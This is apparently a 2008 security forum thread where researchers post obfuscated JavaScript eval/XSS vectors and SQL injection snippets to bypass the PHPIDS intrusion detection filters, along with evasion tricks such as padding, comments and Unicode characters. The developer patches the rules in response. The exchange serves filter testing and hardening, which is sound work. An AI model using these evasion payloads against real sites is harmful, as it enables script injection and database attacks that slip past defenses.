Yeah I mentioned a while back that you should do a JS version ;)
I can't see how you can sandbox server side though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Spidermonkey

Yeah I know you can execute javascript server side but I'd think you'd have the same problem. Unless you take the Google Caja approach

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yep - and that should be a bit tooo early right now

Quote

1'*@a or'1
1'*column or'1
1'*id-'0

they all still work by using some spaces:

1' * @a or '1
1' * column or '1
1' * id - '0

Not a Number sure acts like one. Not Not a Number is true: http://p42.us/phpids/43.html

$='e'
$x=!NaN?NaN[$+'val']:$
$x($x('nam'+$)+$)

@thornmaker: nice find!:)

-tx @ lowtech-labs.org

twins!

[p42.us]

$='e'
$x=0e0[$+'val']
$x($x('nam'+$)+$)

[p42.us]

$='e'
a:x=0e0[$+'val']
x(x('nam'+$)+$)

Nice - they didn't work on FF Ubuntu but I saw where this pointed at ;) Fixed!

It's amazing what you can do with a little $: http://p42.us/phpids/47.html

$='e'
,x=$[$+'val']
x(x('nam'+$)+$)

@.mario: The new filters do a good job at stoping x=0['eval'] type injections. I can get an alert through still, but haven't yet been able to inject a double eval as is often necessary for arbitrary code execution --> [demo.phpids.org] and similarly [demo.phpids.org]

0[('ev')+(n='')+(z=('al'),z)](z+'ert(0),'+/x/)

and

0[('ev')+status+(z=('al'),z)](z+'ert(0),'+/x/)

Edited 1 time(s). Last edit at 01/19/2008 10:46PM by thornmaker.

I had some more time to kill waiting for mythtv to compile.... [p42.us]

$x={}.eval,$x($x(('na'+status+('me')+/x/))

[edit] this one should work, but doesn't, and I can't figure out why. [p42.us]

$={}.eval,$($('na'+navigator.vendor+('me,')+/x/))

Edited 1 time(s). Last edit at 01/20/2008 03:31AM by thornmaker.

Hi!

Hehe - I knew the navigator properties would some when be abused to obfuscate a vector :) I did just a slight modification to the rules but changed the centrifuge - this way all stings are detected correctly w/o too many customizations. Thx!

Greetings,
.mario



Edited 1 time(s). Last edit at 01/20/2008 04:31AM by .mario.

http://p42.us/phpids/50.html

$=.1.eval,$($('na'+status+('me'),1))

[edit] I don't think the centrifuge ratio check is very effective.

            if($overall_length/$stripped_length <= 3.5) {
                $value .= "\n§[!!!]";            
            }

If this was the only thing catching an injection, it is trivial to get around. For example, if the best I could do with the above injection was

$=.1.eval,$($('na'+navigator.vendor+('me'),1))

this would presently only be blocked by this ratio check. This is trivial to get around however. For example, you can embed a bunch of white space chars at the end, embed white space characters throughout the injection, or even add in \w characters in the middle of the injection e.g. change the variable $ to $xxxxxxxxx. The rest of the centrifuge is certainly effective, and is the primary reason the injections have been diminishing over time. I just can't think of a good way to use a ratio check like this that can't be avoided with minimal effort.



Edited 1 time(s). Last edit at 01/20/2008 11:35PM by thornmaker.

Hi!

I know - the ratio check is still in work. I am currently testing on how to avoid that problem with the \w repetition most efficiently but haven't had time to search for a solution in depth. But will be done during the next days. A quick fix will be to trim all empty spaces before the measurement but that of course isn't bulletproof either. I think I will run a series of tests either this evening or Friday - let's see what can be accomplished ;)

Greetings,
.mario

@mario

Why don't you create a alert logger that interacts with the centrifuge engine? That way the PHPIDS can fix itself ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth:

That sounds interesting but there would be a lot of planning necessary for such a feature. This would mean a complete JS based IPS/IDS which is able to communicate with a|the server and update the centrifuge.

The current target is to get rid of the overlong concatenation rules - that demands lots of optimizations of the centrifuge first (and we are indeed pretty close to getting there). After that - let's see. I think the generic attack detection definitely has potential.

Greetings,
.mario

An injection can be massaged to have any [\w\s] to [^\w\s] ratio needed... I just don't see that approach ever working.

I think your present approach of filtering for 3 different classes of characters that are typically only found in code is a good way to go about it, though it does seem a bit overly complicated the way it substitutes characters, shuffles, and then matches against a regex.

hehe cool :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Cool indeed - but anyway - the centrifuge components are still a work in progress. I will take care of that issue Wednesday evening.

Kay - I did a fix but it's not the nicest one. I will look deeper into that issue on Wednesday evening :)

Greetings,
.mario

Hey mario + team

You're all doing a great job btw, protecting against this stuff isn't easy and I think the PHPIDS has come a long way since the first version.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

thornmaker Wrote:
-------------------------------------------------------
> An injection can be massaged to have any [\w\s] to
> [^\w\s] ratio needed... I just don't see that
> approach ever working.
[snip]
> $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1))

@thornmaker: I have the feeling your probably right.
But I wonder, what about looking at unique "words" and using that count in the ratio as well, as opposed to just characters classes. That is, in the vector that thronmaker posted, I see 6 unique 'words':
$xxxxxxx
1
eval
na
status
me

Although you can pretty much infinitely pad out your variable names, to a certain extent you can make that irrelevant, because a variable is only useful if it's used. I mean that, a variable will have to be assigned and called which means we should see it at least twice (in many vectors, though not all).

If that approach is taken then a variable like $x is the same as $xxxxxxxxxxxxx so long as we can 'mark' it essentially as a variable (based on the fact that it's used multiple times) and weight it accordingly.

EDIT: This can be bypassed by inserting comments containing natural looking language or by assigning values to strings that are never used, but I think it has promise:

$str_length_weight = count($unique_words)/str_len($vector); //just pseudo code, but you get the idea.

<wishful_thinking type='unrealistic'>
what phpids needs is a fully sandboxed universal parser
</wishful_thinking>

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 01/21/2008 09:58PM by tx.

@tx: I think inserting random code in comments is very doable, or creating dummy variables in insignificant places, or by adding strings or regular expressions in with textual data.

@Gareth (and PHP Team): I definitely agree! The project has come a long way, and the team is doing a terrific job :)

Thx ;)

@tx: I agree with your wishful thoughts - but there are many obstacles on the path to create a tool which utilizes that kind of helpers _and_ is still usable and compatible to most default settings. I heard about several people trying to install and use the PHPIDS and they even had difficulties in reading out the total impact from the result object - so there's no way we can expect them to install spidermonkey or similar stuff :-/

@all: The method tx mentioned is _kind of_ used at the moment as a hot fix for the weight fuzzing issue. It works fine for JS since all word character sequences longer than a certain amount are normalized to a fix length. If you try to create noise with special chars the centrifuge method strikes again. At the moment you can circumvent this by using Unicode nodes like ß, ä and so on - see Gareth's variable tester for more *g* - I will take care of that asap - although it hurts me to have the second position in the code where \p{L} is needed...

Greetings!
.mario

Quote

Hey mario + team

You're all doing a great job btw, protecting against this stuff isn't easy and I think the PHPIDS has come a long way since the first version.

very true! thats why tiny slips are no problem ;)

1' *id-'0

The centrifuge can also be circumvented by staying under 30 chars (22 to be exact!): http://p42.us/phpids/51.html
and a much longer example which messes with any ratio detection: http://p42.us/phpids/51a.html

Yikes - comments.. Who invented those double-slashers ;)

Anyway: I fixed the problem and during the process i reviewed the rules some more and deleted loads of stuff we could have thrown away weeks ago. Which is good. All injections are fixed - including the SQLIs that slipped through somehow. 10x!

Current revision: 26955 bytes
Last revision: 27929 bytes

http://p42.us/phpids/52.html

$=.7.eval,$($('\rname'),1)

for the record: \f \t \r and \n all seem to work... can I buy a vowel? :)



Edited 1 time(s). Last edit at 01/22/2008 12:47PM by thornmaker.